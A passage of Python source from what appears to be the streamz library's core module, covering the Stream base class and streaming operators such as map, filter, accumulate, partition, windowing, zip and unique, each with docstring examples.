upstream.downstreams.add(self)
def _set_loop(self, loop):
self.loop = None
if loop is not None:
self._inform_loop(loop)
else:
for upstream in self.upstreams:
if upstream and upstream.loop:
self.loop = upstream.loop
break
def _inform_loop(self, loop):
"""
Percolate information about an event loop to the rest of the stream
"""
if self.loop is not None:
if self.loop is not loop:
raise ValueError("Two different event loops active")
else:
self.loop = loop
for upstream in self.upstreams:
if upstream:
upstream._inform_loop(loop)
for downstream in self.downstreams:
if downstream:
downstream._inform_loop(loop)
def _set_asynchronous(self, asynchronous):
self.asynchronous = None
if asynchronous is not None:
self._inform_asynchronous(asynchronous)
else:
for upstream in self.upstreams:
if upstream and upstream.asynchronous:
self.asynchronous = upstream.asynchronous
break
def _inform_asynchronous(self, asynchronous):
"""
Percolate information about an event loop to the rest of the stream
"""
if self.asynchronous is not None:
if self.asynchronous is not asynchronous:
raise ValueError("Stream has both asynchronous and synchronous elements")
else:
self.asynchronous = asynchronous
for upstream in self.upstreams:
if upstream:
upstream._inform_asynchronous(asynchronous)
for downstream in self.downstreams:
if downstream:
downstream._inform_asynchronous(asynchronous)
def _add_upstream(self, upstream):
"""Add upstream to current upstreams, this method is overridden for
classes which handle stream specific buffers/caches"""
self.upstreams.append(upstream)
def _add_downstream(self, downstream):
"""Add downstream to current downstreams"""
self.downstreams.add(downstream)
def _remove_downstream(self, downstream):
"""Remove downstream from current downstreams"""
self.downstreams.remove(downstream)
def _remove_upstream(self, upstream):
"""Remove upstream from current upstreams, this method is overridden for
classes which handle stream specific buffers/caches"""
self.upstreams.remove(upstream)
def start(self):
""" Start any upstream sources """
for upstream in self.upstreams:
upstream.start()
def stop(self):
""" Stop upstream sources """
for upstream in self.upstreams:
upstream.stop()
def __str__(self):
s_list = []
if self.name:
s_list.append('{}; {}'.format(self.name, self.__class__.__name__))
else:
s_list.append(self.__class__.__name__)
for m in self.str_list:
s = ''
at = getattr(self, m, None)
if at:
if not callable(at):
s = str(at)
elif hasattr(at, '__name__'):
s = getattr(self, m).__name__
else:
s = None
if s:
s_list.append('{}={}'.format(m, s))
if len(s_list) <= 2:
s_list = [term.split('=')[-1] for term in s_list]
text = "<"
text += s_list[0]
if len(s_list) > 1:
text += ': '
text += ', '.join(s_list[1:])
text += '>'
return text
__repr__ = __str__
def _ipython_display_(self, **kwargs): # pragma: no cover
try:
import ipywidgets
from IPython.core.interactiveshell import InteractiveShell
output = ipywidgets.Output(_view_count=0)
except ImportError:
# since this function is only called by jupyter, this import must succeed
from IPython.display import display, HTML
if hasattr(self, '_repr_html_'):
return display(HTML(self._repr_html_()))
else:
return display(self.__repr__())
output_ref = weakref.ref(output)
def update_cell(val):
output = output_ref()
if output is None:
return
with output:
content, *_ = InteractiveShell.instance().display_formatter.format(val)
output.outputs = ({'output_type': 'display_data',
'data': content,
'metadata': {}},)
s = self.map(update_cell)
_html_update_streams.add(s)
self.output_ref = output_ref
s_ref = weakref.ref(s)
def remove_stream(change):
output = output_ref()
if output is None:
return
if output._view_count == 0:
ss = s_ref()
ss.destroy()
_html_update_streams.remove(ss) # trigger gc
output.observe(remove_stream, '_view_count')
return output._ipython_display_(**kwargs)
def _emit(self, x, metadata=None):
"""
Push data into the stream at this point
Parameters
----------
x: any
an element of data
metadata: list[dict], optional
Various types of metadata associated with the data element in `x`.
ref: RefCounter
A reference counter used to check when data is done
"""
self.current_value = x
self.current_metadata = metadata
if metadata:
self._retain_refs(metadata, len(self.downstreams))
else:
metadata = []
result = []
for downstream in list(self.downstreams):
r = downstream.update(x, who=self, metadata=metadata)
if type(r) is list:
result.extend(r)
else:
result.append(r)
self._release_refs(metadata)
return [element for element in result if element is not None]
def emit(self, x, asynchronous=False, metadata=None):
""" Push data into the stream at this point
This is typically done only at source Streams but can theoretically be
done at any point
Parameters
----------
x: any
an element of data
asynchronous:
emit asynchronously
metadata: list[dict], optional
Various types of metadata associated with the data element in `x`.
ref: RefCounter
A reference counter used to check when data is done
"""
ts_async = getattr(thread_state, 'asynchronous', False)
if self.loop is None or asynchronous or self.asynchronous or ts_async:
if not ts_async:
thread_state.asynchronous = True
try:
result = self._emit(x, metadata=metadata)
if self.loop:
return gen.convert_yielded(result)
finally:
thread_state.asynchronous = ts_async
else:
async def _():
thread_state.asynchronous = True
try:
result = await asyncio.gather(*self._emit(x, metadata=metadata))
finally:
del thread_state.asynchronous
return result
sync(self.loop, _)
def update(self, x, who=None, metadata=None):
return self._emit(x, metadata=metadata)
def gather(self):
""" This is a no-op for core streamz
This allows gather to be used in both dask and core streams
"""
return self
def connect(self, downstream):
""" Connect this stream to a downstream element.
Parameters
----------
downstream: Stream
The downstream stream to connect to
"""
self._add_downstream(downstream)
downstream._add_upstream(self)
def disconnect(self, downstream):
""" Disconnect this stream to a downstream element.
Parameters
----------
downstream: Stream
The downstream stream to disconnect from
"""
self._remove_downstream(downstream)
downstream._remove_upstream(self)
@property
def upstream(self):
if len(self.upstreams) > 1:
raise ValueError("Stream has multiple upstreams")
elif len(self.upstreams) == 0:
return None
else:
return self.upstreams[0]
def destroy(self, streams=None):
"""
Disconnect this stream from any upstream sources
"""
if streams is None:
streams = self.upstreams
for upstream in list(streams):
upstream._remove_downstream(self)
self._remove_upstream(upstream)
def scatter(self, **kwargs):
from .dask import scatter
return scatter(self, **kwargs)
def remove(self, predicate):
""" Only pass through elements for which the predicate returns False """
return self.filter(lambda x: not predicate(x))
@property
def scan(self):
return self.accumulate
@property
def concat(self):
return self.flatten
def sink_to_list(self):
""" Append all elements of a stream to a list as they come in
Examples
--------
>>> source = Stream()
>>> L = source.map(lambda x: 10 * x).sink_to_list()
>>> for i in range(5):
... source.emit(i)
>>> L
[0, 10, 20, 30, 40]
"""
L = []
self.sink(L.append)
return L
def frequencies(self, **kwargs):
""" Count occurrences of elements """
def update_frequencies(last, x):
return toolz.assoc(last, x, last.get(x, 0) + 1)
return self.scan(update_frequencies, start={}, **kwargs)
def visualize(self, filename='mystream.png', **kwargs):
"""Render the computation of this object's task graph using graphviz.
Requires ``graphviz`` and ``networkx`` to be installed.
Parameters
----------
filename : str, optional
The name of the file to write to disk.
kwargs:
Graph attributes to pass to graphviz like ``rankdir="LR"``
"""
from .graph import visualize
return visualize(self, filename, **kwargs)
def to_dataframe(self, example):
""" Convert a stream of Pandas dataframes to a DataFrame
Examples
--------
>>> source = Stream()
>>> sdf = source.to_dataframe()
>>> L = sdf.groupby(sdf.x).y.mean().stream.sink_to_list()
>>> source.emit(pd.DataFrame(...)) # doctest: +SKIP
>>> source.emit(pd.DataFrame(...)) # doctest: +SKIP
>>> source.emit(pd.DataFrame(...)) # doctest: +SKIP
"""
from .dataframe import DataFrame
return DataFrame(stream=self, example=example)
def to_batch(self, **kwargs):
""" Convert a stream of lists to a Batch
All elements of the stream are assumed to be lists or tuples
Examples
--------
>>> source = Stream()
>>> batches = source.to_batch()
>>> L = batches.pluck('value').map(inc).sum().stream.sink_to_list()
>>> source.emit([{'name': 'Alice', 'value': 1},
... {'name': 'Bob', 'value': 2},
... {'name': 'Charlie', 'value': 3}])
>>> source.emit([{'name': 'Alice', 'value': 4},
... {'name': 'Bob', 'value': 5},
... {'name': 'Charlie', 'value': 6}])
"""
from .batch import Batch
return Batch(stream=self, **kwargs)
def _retain_refs(self, metadata, n=1):
""" Retain all references in the provided metadata `n` number of times
Parameters
----------
metadata: list[dict], optional
Various types of metadata associated with the data element in `x`.
ref: RefCounter
A reference counter used to check when data is done
n: The number of times to retain the provided references
"""
for m in metadata:
if 'ref' in m:
m['ref'].retain(n)
def _release_refs(self, metadata, n=1):
""" Release all references in the provided metadata `n` number of times
Parameters
----------
metadata: list[dict], optional
Various types of metadata associated with the data element in `x`.
ref: RefCounter
A reference counter used to check when data is done
n: The number of times to retain the provided references
"""
for m in metadata:
if 'ref' in m:
m['ref'].release(n)
@Stream.register_api()
class map(Stream):
""" Apply a function to every element in the stream
Parameters
----------
func: callable
*args :
The arguments to pass to the function.
**kwargs:
Keyword arguments to pass to func
Examples
--------
>>> source = Stream()
>>> source.map(lambda x: 2*x).sink(print)
>>> for i in range(5):
... source.emit(i)
0
2
4
6
8
"""
def __init__(self, upstream, func, *args, **kwargs):
self.func = func
# this is one of a few stream specific kwargs
stream_name = kwargs.pop('stream_name', None)
self.kwargs = kwargs
self.args = args
Stream.__init__(self, upstream, stream_name=stream_name)
def update(self, x, who=None, metadata=None):
try:
result = self.func(x, *self.args, **self.kwargs)
except Exception as e:
logger.exception(e)
raise
else:
return self._emit(result, metadata=metadata)
@Stream.register_api()
class starmap(Stream):
""" Apply a function to every element in the stream, splayed out
See ``itertools.starmap``
Parameters
----------
func: callable
*args :
The arguments to pass to the function.
**kwargs:
Keyword arguments to pass to func
Examples
--------
>>> source = Stream()
>>> source.starmap(lambda a, b: a + b).sink(print)
>>> for i in range(5):
... source.emit((i, i))
0
2
4
6
8
"""
def __init__(self, upstream, func, *args, **kwargs):
self.func = func
# this is one of a few stream specific kwargs
stream_name = kwargs.pop('stream_name', None)
self.kwargs = kwargs
self.args = args
Stream.__init__(self, upstream, stream_name=stream_name)
def update(self, x, who=None, metadata=None):
y = x + self.args
try:
result = self.func(*y, **self.kwargs)
except Exception as e:
logger.exception(e)
raise
else:
return self._emit(result, metadata=metadata)
def _truthy(x):
return not not x
@Stream.register_api()
class filter(Stream):
""" Only pass through elements that satisfy the predicate
Parameters
----------
predicate : function
The predicate. Should return True or False, where
True means that the predicate is satisfied.
*args :
The arguments to pass to the predicate.
**kwargs:
Keyword arguments to pass to predicate
Examples
--------
>>> source = Stream()
>>> source.filter(lambda x: x % 2 == 0).sink(print)
>>> for i in range(5):
... source.emit(i)
0
2
4
"""
def __init__(self, upstream, predicate, *args, **kwargs):
if predicate is None:
predicate = _truthy
self.predicate = predicate
stream_name = kwargs.pop("stream_name", None)
self.kwargs = kwargs
self.args = args
Stream.__init__(self, upstream, stream_name=stream_name)
def update(self, x, who=None, metadata=None):
if self.predicate(x, *self.args, **self.kwargs):
return self._emit(x, metadata=metadata)
@Stream.register_api()
class accumulate(Stream):
""" Accumulate results with previous state
This performs running or cumulative reductions, applying the function
to the previous total and the new element. The function should take
two arguments, the previous accumulated state and the next element and
it should return a new accumulated state,
- ``state = func(previous_state, new_value)`` (returns_state=False)
- ``state, result = func(previous_state, new_value)`` (returns_state=True)
where the new_state is passed to the next invocation. The state or result
is emitted downstream for the two cases.
Parameters
----------
func: callable
start: object
Initial value, passed as the value of ``previous_state`` on the first
invocation. Defaults to the first submitted element
returns_state: boolean
If true then func should return both the state and the value to emit
If false then both values are the same, and func returns one value
**kwargs:
Keyword arguments to pass to func
Examples
--------
A running total, producing triangular numbers
>>> source = Stream()
>>> source.accumulate(lambda acc, x: acc + x).sink(print)
>>> for i in range(5):
... source.emit(i)
0
1
3
6
10
A count of number of events (including the current one)
>>> source = Stream()
>>> source.accumulate(lambda acc, x: acc + 1, start=0).sink(print)
>>> for _ in range(5):
... source.emit(0)
1
2
3
4
5
Like the builtin "enumerate".
>>> source = Stream()
>>> source.accumulate(lambda acc, x: ((acc[0] + 1, x), (acc[0], x)),
... start=(0, 0), returns_state=True
... ).sink(print)
>>> for i in range(3):
... source.emit(0)
(0, 0)
(1, 0)
(2, 0)
"""
_graphviz_shape = 'box'
def __init__(self, upstream, func, start=no_default, returns_state=False,
**kwargs):
self.func = func
self.kwargs = kwargs
self.state = start
self.returns_state = returns_state
# this is one of a few stream specific kwargs
stream_name = kwargs.pop('stream_name', None)
self.with_state = kwargs.pop('with_state', False)
Stream.__init__(self, upstream, stream_name=stream_name)
def update(self, x, who=None, metadata=None):
if self.state is no_default:
self.state = x
if self.with_state:
return self._emit((self.state, x), metadata=metadata)
else:
return self._emit(x, metadata=metadata)
else:
try:
result = self.func(self.state, x, **self.kwargs)
except Exception as e:
logger.exception(e)
raise
if self.returns_state:
state, result = result
else:
state = result
self.state = state
if self.with_state:
return self._emit((self.state, result), metadata=metadata)
else:
return self._emit(result, metadata=metadata)
@Stream.register_api()
class slice(Stream):
"""
Get only some events in a stream by position. Works like list[] syntax.
Parameters
----------
start : int
First event to use. If None, start from the beginnning
end : int
Last event to use (non-inclusive). If None, continue without stopping.
Does not support negative indexing.
step : int
Pass on every Nth event. If None, pass every one.
Examples
--------
>>> source = Stream()
>>> source.slice(2, 6, 2).sink(print)
>>> for i in range(5):
... source.emit(0)
2
4
"""
def __init__(self, upstream, start=None, end=None, step=None, **kwargs):
self.state = 0
self.star = start or 0
self.end = end
self.step = step or 1
if any((_ or 0) < 0 for _ in [start, end, step]):
raise ValueError("Negative indices not supported by slice")
stream_name = kwargs.pop('stream_name', None)
Stream.__init__(self, upstream, stream_name=stream_name)
self._check_end()
def update(self, x, who=None, metadata=None):
if self.state >= self.star and self.state % self.step == 0:
self.emit(x, metadata=metadata)
self.state += 1
self._check_end()
def _check_end(self):
if self.end and self.state >= self.end:
# we're done
for upstream in self.upstreams:
upstream._remove_downstream(self)
@Stream.register_api()
class partition(Stream):
""" Partition stream into tuples of equal size
Parameters
----------
n: int
Maximum partition size
timeout: int or float, optional
Number of seconds after which a partition will be emitted,
even if its size is less than ``n``. If ``None`` (default),
a partition will be emitted only when its size reaches ``n``.
key: hashable or callable, optional
Emit items with the same key together as a separate partition.
If ``key`` is callable, partition will be identified by ``key(x)``,
otherwise by ``x[key]``. Defaults to ``None``.
Examples
--------
>>> source = Stream()
>>> source.partition(3).sink(print)
>>> for i in range(10):
... source.emit(i)
(0, 1, 2)
(3, 4, 5)
(6, 7, 8)
>>> source = Stream()
>>> source.partition(2, key=lambda x: x % 2).sink(print)
>>> for i in range(4):
... source.emit(i)
(0, 2)
(1, 3)
>>> from time import sleep
>>> source = Stream()
>>> source.partition(5, timeout=1).sink(print)
>>> for i in range(3):
... source.emit(i)
>>> sleep(1)
(0, 1, 2)
"""
_graphviz_shape = 'diamond'
def __init__(self, upstream, n, timeout=None, key=None, **kwargs):
self.n = n
self._timeout = timeout
self._key = key
self._buffer = defaultdict(lambda: [])
self._metadata_buffer = defaultdict(lambda: [])
self._callbacks = {}
kwargs["ensure_io_loop"] = True
Stream.__init__(self, upstream, **kwargs)
def _get_key(self, x):
if self._key is None:
return None
if callable(self._key):
return self._key(x)
return x[self._key]
@gen.coroutine
def _flush(self, key):
result, self._buffer[key] = self._buffer[key], []
metadata_result, self._metadata_buffer[key] = self._metadata_buffer[key], []
yield self._emit(tuple(result), list(metadata_result))
self._release_refs(metadata_result)
@gen.coroutine
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
key = self._get_key(x)
buffer = self._buffer[key]
metadata_buffer = self._metadata_buffer[key]
buffer.append(x)
if isinstance(metadata, list):
metadata_buffer.extend(metadata)
else:
metadata_buffer.append(metadata)
if len(buffer) == self.n:
if self._timeout is not None and self.n > 1:
self._callbacks[key].cancel()
yield self._flush(key)
return
if len(buffer) == 1 and self._timeout is not None:
self._callbacks[key] = self.loop.call_later(
self._timeout, self._flush, key
)
@Stream.register_api()
class partition_unique(Stream):
"""
Partition stream elements into groups of equal size with unique keys only.
Parameters
----------
n: int
Number of (unique) elements to pass through as a group.
key: Union[Hashable, Callable[[Any], Hashable]]
Callable that accepts a stream element and returns a unique, hashable
representation of the incoming data (``key(x)``), or a hashable that gets
the corresponding value of a stream element (``x[key]``). For example,
``key=lambda x: x["a"]`` would allow only elements with unique ``"a"`` values
to pass through.
.. note:: By default, we simply use the element object itself as the key,
so that object must be hashable. If that's not the case, a non-default
key must be provided.
keep: str
Which element to keep in the case that a unique key is already found
in the group. If "first", keep element from the first occurrence of a given
key; if "last", keep element from the most recent occurrence. Note that
relative ordering of *elements* is preserved in the data passed through,
and not ordering of *keys*.
**kwargs
Examples
--------
>>> source = Stream()
>>> stream = source.partition_unique(n=3, keep="first").sink(print)
>>> eles = [1, 2, 1, 3, 1, 3, 3, 2]
>>> for ele in eles:
... source.emit(ele)
(1, 2, 3)
(1, 3, 2)
>>> source = Stream()
>>> stream = source.partition_unique(n=3, keep="last").sink(print)
>>> eles = [1, 2, 1, 3, 1, 3, 3, 2]
>>> for ele in eles:
... source.emit(ele)
(2, 1, 3)
(1, 3, 2)
>>> source = Stream()
>>> stream = source.partition_unique(n=3, key=lambda x: len(x), keep="last").sink(print)
>>> eles = ["f", "fo", "f", "foo", "f", "foo", "foo", "fo"]
>>> for ele in eles:
... source.emit(ele)
('fo', 'f', 'foo')
('f', 'foo', 'fo')
"""
_graphviz_shape = "diamond"
def __init__(
self,
upstream,
n: int,
key: Union[Hashable, Callable[[Any], Hashable]] = identity,
keep: str = "first", # Literal["first", "last"]
**kwargs
):
self.n = n
self.key = key
self.keep = keep
self._buffer = {}
self._metadata_buffer = {}
Stream.__init__(self, upstream, **kwargs)
def _get_key(self, x):
if callable(self.key):
return self.key(x)
else:
return x[self.key]
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
y = self._get_key(x)
if self.keep == "last":
# remove key if already present so that emitted value
# will reflect elements' actual relative ordering
self._buffer.pop(y, None)
self._metadata_buffer.pop(y, None)
self._buffer[y] = x
self._metadata_buffer[y] = metadata
else: # self.keep == "first"
if y not in self._buffer:
self._buffer[y] = x
self._metadata_buffer[y] = metadata
if len(self._buffer) == self.n:
result, self._buffer = tuple(self._buffer.values()), {}
metadata_result, self._metadata_buffer = list(self._metadata_buffer.values()), {}
ret = self._emit(result, metadata_result)
self._release_refs(metadata_result)
return ret
else:
return []
@Stream.register_api()
class sliding_window(Stream):
""" Produce overlapping tuples of size n
Parameters
----------
return_partial : bool
If True, yield tuples as soon as any events come in, each tuple being
smaller or equal to the window size. If False, only start yielding
tuples once a full window has accrued.
Examples
--------
>>> source = Stream()
>>> source.sliding_window(3, return_partial=False).sink(print)
>>> for i in range(8):
... source.emit(i)
(0, 1, 2)
(1, 2, 3)
(2, 3, 4)
(3, 4, 5)
(4, 5, 6)
(5, 6, 7)
"""
_graphviz_shape = 'diamond'
def __init__(self, upstream, n, return_partial=True, **kwargs):
self.n = n
self._buffer = deque(maxlen=n)
self.metadata_buffer = deque(maxlen=n)
self.partial = return_partial
Stream.__init__(self, upstream, **kwargs)
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
self._buffer.append(x)
if not isinstance(metadata, list):
metadata = [metadata]
self.metadata_buffer.append(metadata)
if self.partial or len(self._buffer) == self.n:
flat_metadata = [m for ml in self.metadata_buffer for m in ml]
ret = self._emit(tuple(self._buffer), flat_metadata)
if len(self.metadata_buffer) == self.n:
completed = self.metadata_buffer.popleft()
self._release_refs(completed)
return ret
else:
return []
def convert_interval(interval):
if isinstance(interval, str):
import pandas as pd
interval = pd.Timedelta(interval).total_seconds()
return interval
@Stream.register_api()
class timed_window(Stream):
""" Emit a tuple of collected results every interval
Every ``interval`` seconds this emits a tuple of all of the results
seen so far. This can help to batch data coming off of a high-volume
stream.
"""
_graphviz_shape = 'octagon'
def __init__(self, upstream, interval, **kwargs):
self.interval = convert_interval(interval)
self._buffer = []
self.metadata_buffer = []
self.last = gen.moment
kwargs["ensure_io_loop"] = True
Stream.__init__(self, upstream, **kwargs)
self.loop.add_callback(self.cb)
def update(self, x, who=None, metadata=None):
self._buffer.append(x)
self._retain_refs(metadata)
self.metadata_buffer.append(metadata)
return self.last
@gen.coroutine
def cb(self):
while True:
L, self._buffer = self._buffer, []
metadata, self.metadata_buffer = self.metadata_buffer, []
m = [m for ml in metadata for m in ml]
self.last = self._emit(L, m)
self._release_refs(m)
yield self.last
yield gen.sleep(self.interval)
@Stream.register_api()
class timed_window_unique(Stream):
"""
Emit a group of elements with unique keys every ``interval`` seconds.
Parameters
----------
interval: Union[int, str]
Number of seconds over which to group elements, or a ``pandas``-style
duration string that can be converted into seconds.
key: Union[Hashable, Callable[[Any], Hashable]]
Callable that accepts a stream element and returns a unique, hashable
representation of the incoming data (``key(x)``), or a hashable that gets
the corresponding value of a stream element (``x[key]``). For example, both
``key=lambda x: x["a"]`` and ``key="a"`` would allow only elements with unique
``"a"`` values to pass through.
.. note:: By default, we simply use the element object itself as the key,
so that object must be hashable. If that's not the case, a non-default
key must be provided.
keep: str
Which element to keep in the case that a unique key is already found
in the group. If "first", keep element from the first occurrence of a given
key; if "last", keep element from the most recent occurrence. Note that
relative ordering of *elements* is preserved in the data passed through,
and not ordering of *keys*.
Examples
--------
>>> source = Stream()
Get unique hashable elements in a window, keeping just the first occurrence:
>>> stream = source.timed_window_unique(interval=1.0, keep="first").sink(print)
>>> for ele in [1, 2, 3, 3, 2, 1]:
... source.emit(ele)
()
(1, 2, 3)
()
Get unique hashable elements in a window, keeping just the last occurrence:
>>> stream = source.timed_window_unique(interval=1.0, keep="last").sink(print)
>>> for ele in [1, 2, 3, 3, 2, 1]:
... source.emit(ele)
()
(3, 2, 1)
()
Get unique elements in a window by (string) length, keeping just the first occurrence:
>>> stream = source.timed_window_unique(interval=1.0, key=len, keep="first")
>>> for ele in ["f", "b", "fo", "ba", "foo", "bar"]:
... source.emit(ele)
()
('f', 'fo', 'foo')
()
Get unique elements in a window by (string) length, keeping just the last occurrence:
>>> stream = source.timed_window_unique(interval=1.0, key=len, keep="last")
>>> for ele in ["f", "b", "fo", "ba", "foo", "bar"]:
... source.emit(ele)
()
('b', 'ba', 'bar')
()
"""
_graphviz_shape = "octagon"
def __init__(
self,
upstream,
interval: Union[int, str],
key: Union[Hashable, Callable[[Any], Hashable]] = identity,
keep: str = "first", # Literal["first", "last"]
**kwargs
):
self.interval = convert_interval(interval)
self.key = key
self.keep = keep
self._buffer = {}
self._metadata_buffer = {}
self.last = gen.moment
kwargs["ensure_io_loop"] = True
Stream.__init__(self, upstream, **kwargs)
self.loop.add_callback(self.cb)
def _get_key(self, x):
if callable(self.key):
return self.key(x)
else:
return x[self.key]
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
y = self._get_key(x)
if self.keep == "last":
# remove key if already present so that emitted value
# will reflect elements' actual relative ordering
self._buffer.pop(y, None)
self._metadata_buffer.pop(y, None)
self._buffer[y] = x
self._metadata_buffer[y] = metadata
else: # self.keep == "first"
if y not in self._buffer:
self._buffer[y] = x
self._metadata_buffer[y] = metadata
return self.last
@gen.coroutine
def cb(self):
while True:
result, self._buffer = tuple(self._buffer.values()), {}
metadata_result, self._metadata_buffer = list(self._metadata_buffer.values()), {}
# TODO: figure out why metadata_result is handled differently here...
m = [m for ml in metadata_result for m in ml]
self.last = self._emit(result, m)
self._release_refs(m)
yield self.last
yield gen.sleep(self.interval)
@Stream.register_api()
class delay(Stream):
""" Add a time delay to results """
_graphviz_shape = 'octagon'
def __init__(self, upstream, interval, **kwargs):
self.interval = convert_interval(interval)
self.queue = Queue()
kwargs["ensure_io_loop"] = True
Stream.__init__(self, upstream,**kwargs)
self.loop.add_callback(self.cb)
@gen.coroutine
def cb(self):
while True:
last = time()
x, metadata = yield self.queue.get()
yield self._emit(x, metadata=metadata)
self._release_refs(metadata)
duration = self.interval - (time() - last)
if duration > 0:
yield gen.sleep(duration)
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
return self.queue.put((x, metadata))
@Stream.register_api()
class rate_limit(Stream):
""" Limit the flow of data
This stops two elements of streaming through in an interval shorter
than the provided value.
Parameters
----------
interval: float
Time in seconds
"""
_graphviz_shape = 'octagon'
def __init__(self, upstream, interval, **kwargs):
self.interval = convert_interval(interval)
self.next = 0
kwargs["ensure_io_loop"] = True
Stream.__init__(self, upstream, **kwargs)
@gen.coroutine
def update(self, x, who=None, metadata=None):
now = time()
old_next = self.next
self.next = max(now, self.next) + self.interval
if now < old_next:
yield gen.sleep(old_next - now)
yield self._emit(x, metadata=metadata)
@Stream.register_api()
class buffer(Stream):
""" Allow results to pile up at this point in the stream
This allows results to buffer in place at various points in the stream.
This can help to smooth flow through the system when backpressure is
applied.
"""
_graphviz_shape = 'diamond'
def __init__(self, upstream, n, **kwargs):
self.queue = Queue(maxsize=n)
kwargs["ensure_io_loop"] = True
Stream.__init__(self, upstream, **kwargs)
self.loop.add_callback(self.cb)
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
return self.queue.put((x, metadata))
@gen.coroutine
def cb(self):
while True:
x, metadata = yield self.queue.get()
yield self._emit(x, metadata=metadata)
self._release_refs(metadata)
@Stream.register_api()
class zip(Stream):
""" Combine streams together into a stream of tuples
We emit a new tuple once all streams have produce a new tuple.
See also
--------
combine_latest
zip_latest
"""
_graphviz_orientation = 270
_graphviz_shape = 'triangle'
def __init__(self, *upstreams, **kwargs):
self.maxsize = kwargs.pop('maxsize', 10)
self.condition = Condition()
self.literals = [(i, val) for i, val in enumerate(upstreams)
if not isinstance(val, Stream)]
self.buffers = {upstream: deque()
for upstream in upstreams
if isinstance(upstream, Stream)}
upstreams2 = [upstream for upstream in upstreams if isinstance(upstream, Stream)]
Stream.__init__(self, upstreams=upstreams2, **kwargs)
def _add_upstream(self, upstream):
# Override method to handle setup of buffer for new stream
self.buffers[upstream] = deque()
super(zip, self)._add_upstream(upstream)
def _remove_upstream(self, upstream):
# Override method to handle removal of buffer for stream
self.buffers.pop(upstream)
super(zip, self)._remove_upstream(upstream)
def pack_literals(self, tup):
""" Fill buffers for literals whenever we empty them """
inp = list(tup)[::-1]
out = []
for i, val in self.literals:
while len(out) < i:
out.append(inp.pop())
out.append(val)
while inp:
out.append(inp.pop())
return tuple(out)
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
L = self.buffers[who] # get buffer for stream
L.append((x, metadata))
if len(L) == 1 and all(self.buffers.values()):
vals = [self.buffers[up][0] for up in self.upstreams]
tup, md = __builtins__['zip'](*vals)
for buf in self.buffers.values():
buf.popleft()
self.condition.notify_all()
if self.literals:
tup = self.pack_literals(tup)
md = [m for ml in md for m in ml]
ret = self._emit(tup, md)
self._release_refs(md)
return ret
elif len(L) > self.maxsize:
return self.condition.wait()
@Stream.register_api()
class combine_latest(Stream):
""" Combine multiple streams together to a stream of tuples
This will emit a new tuple of all of the most recent elements seen from
any stream.
Parameters
----------
emit_on : stream or list of streams or None
only emit upon update of the streams listed.
If None, emit on update from any stream
See Also
--------
zip
"""
_graphviz_orientation = 270
_graphviz_shape = 'triangle'
def __init__(self, *upstreams, **kwargs):
emit_on = kwargs.pop('emit_on', None)
self._initial_emit_on = emit_on
self.last = [None for _ in upstreams]
self.metadata = [None for _ in upstreams]
self.missing = set(upstreams)
if emit_on is not None:
if not isinstance(emit_on, Iterable):
emit_on = (emit_on, )
emit_on = tuple(
upstreams[x] if isinstance(x, int) else x for x in emit_on)
self.emit_on = emit_on
else:
self.emit_on = upstreams
Stream.__init__(self, upstreams=upstreams, **kwargs)
def _add_upstream(self, upstream):
# Override method to handle setup of last and missing for new stream
self.last.append(None)
self.metadata.append(None)
self.missing.update([upstream])
super(combine_latest, self)._add_upstream(upstream)
if self._initial_emit_on is None:
self.emit_on = self.upstreams
def _remove_upstream(self, upstream):
# Override method to handle removal of last and missing for stream
if self.emit_on == upstream:
raise RuntimeError("Can't remove the ``emit_on`` stream since that"
"would cause no data to be emitted. "
"Consider adding an ``emit_on`` first by "
"running ``node.emit_on=(upstream,)`` to add "
"a new ``emit_on`` or running "
"``node.emit_on=tuple(node.upstreams)`` to "
"emit on all incoming data")
self.last.pop(self.upstreams.index(upstream))
self.metadata.pop(self.upstreams.index(upstream))
self.missing.remove(upstream)
super(combine_latest, self)._remove_upstream(upstream)
if self._initial_emit_on is None:
self.emit_on = self.upstreams
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
idx = self.upstreams.index(who)
if self.metadata[idx]:
self._release_refs(self.metadata[idx])
self.metadata[idx] = metadata
if self.missing and who in self.missing:
self.missing.remove(who)
self.last[idx] = x
if not self.missing and who in self.emit_on:
tup = tuple(self.last)
md = [m for ml in self.metadata for m in ml]
return self._emit(tup, md)
@Stream.register_api()
class flatten(Stream):
""" Flatten streams of lists or iterables into a stream of elements
Examples
--------
>>> source = Stream()
>>> source.flatten().sink(print)
>>> for x in [[1, 2, 3], [4, 5], [6, 7, 7]]:
... source.emit(x)
1
2
3
4
5
6
7
See Also
--------
partition
"""
def update(self, x, who=None, metadata=None):
L = []
for i, item in enumerate(x):
if i == len(x) - 1:
y = self._emit(item, metadata=metadata)
else:
y = self._emit(item)
if type(y) is list:
L.extend(y)
else:
L.append(y)
return L
@Stream.register_api()
class unique(Stream):
""" Avoid sending through repeated elements
This deduplicates a stream so that only new elements pass through.
You can control how much of a history is stored with the ``maxsize=``
parameter. For example setting ``maxsize=1`` avoids sending through
elements when one is repeated right after the other.
Parameters
----------
maxsize: int or None, optional
number of stored unique values to check against
key : function, optional
Function which returns a representation of the incoming data.
For example ``key=lambda x: x['a']`` could be used to allow only
pieces of data with unique ``'a'`` values to pass through.
hashable : bool, optional
If True then data is assumed to be hashable, else it is not. This is
used for determining how to cache the history, if hashable then
either dicts or LRU caches are used, otherwise a deque is used.
Defaults to True.
Examples
--------
>>> source = Stream()
>>> source.unique(maxsize=1).sink(print)
>>> for x in [1, 1, 2, 2, 2, 1, 3]:
... source.emit(x)
1
2
1
3
"""
def __init__(self, upstream, maxsize=None, key=identity, hashable=True,
**kwargs):
self.key = key
self.maxsize = maxsize
if hashable:
self.seen = dict()
if self.maxsize:
from zict import LRU
self.seen = LRU(self.maxsize, self.seen)
else:
self.seen = []
Stream.__init__(self, upstream, **kwargs)
def update(self, x, who=None, metadata=None):
y = self.key(x)
emit = True
if isinstance(self.seen, list):
if y in self.seen:
self.seen.remove(y)
emit = False
self.seen.insert(0, y)
if self.maxsize:
del self.seen[self.maxsize:]
if emit:
return self._emit(x, metadata=metadata)
else:
if self.seen.get(y, '~~not_seen~~') == '~~not_seen~~':
self.seen[y] = 1
return self._emit(x, metadata=metadata)
@Stream.register_api()
class union(Stream):
